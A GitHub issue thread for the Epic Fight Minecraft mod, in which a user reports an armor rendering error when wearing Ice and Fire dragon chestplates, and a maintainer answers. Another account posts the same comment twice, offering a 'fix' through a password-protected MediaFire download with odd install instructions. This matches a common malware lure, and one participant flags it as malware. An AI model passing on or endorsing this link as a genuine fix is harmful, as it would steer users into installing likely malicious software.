### ISSUE TITLE
[Bug|Crash]: Ice and Fire Dragon armor error

### ISSUE THREAD

**Issue by a04050818** [Yesssssman/epicfightmod#1781]
### Please check if a similar issue has already been reported.

- [X] I checked this type of issue has never been reported.

### Please check you're using proper versions.

- [X] I checked all of them in the right version.

### Please check if this issue's from out of our area

- [X] I understood the problem.

### The name of the mod

https://www.curseforge.com/minecraft/mc-mods/ice-and-fire-dragons

### After all of these, please check if you're just pressing the ok buttons to skip this process.

- [X] I read the checklist and I promise I'll provide all the information that is needed to fix the issue

### Minecraft Version

1.20.1

### The Issue

![2024-08-27_08 49 13](https://github.com/user-attachments/assets/476fba9e-6278-441c-8a78-0237acc23c28)
穿上任意冰與火龍上衣都會出現盔甲錯誤

### Steps to Reproduce

版本1.20.1  47.3.7  forge   
mod:  citdel 、 epic fight 、 ice and fire
穿上任意冰與火龍的上衣

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by GLMaster19** [comment]
Man, this is malware right here. Don't download it and wait for developers to answer you.

**Comment by a04050818** [comment]
？？

**Comment by guivnf** [comment]
Ice and fire is buggy, has a lot of issues that happen on it's own, and from what i know alex isn't even the one updating it anymore, so i'd just remove it as it looks like it's a weird issue on their side. Aside from that, you can try waiting for when we get to fixing most first person problems in upcoming updates.

**Comment by 0101a1a** [comment]
Similar issue in #1793 with different mods.
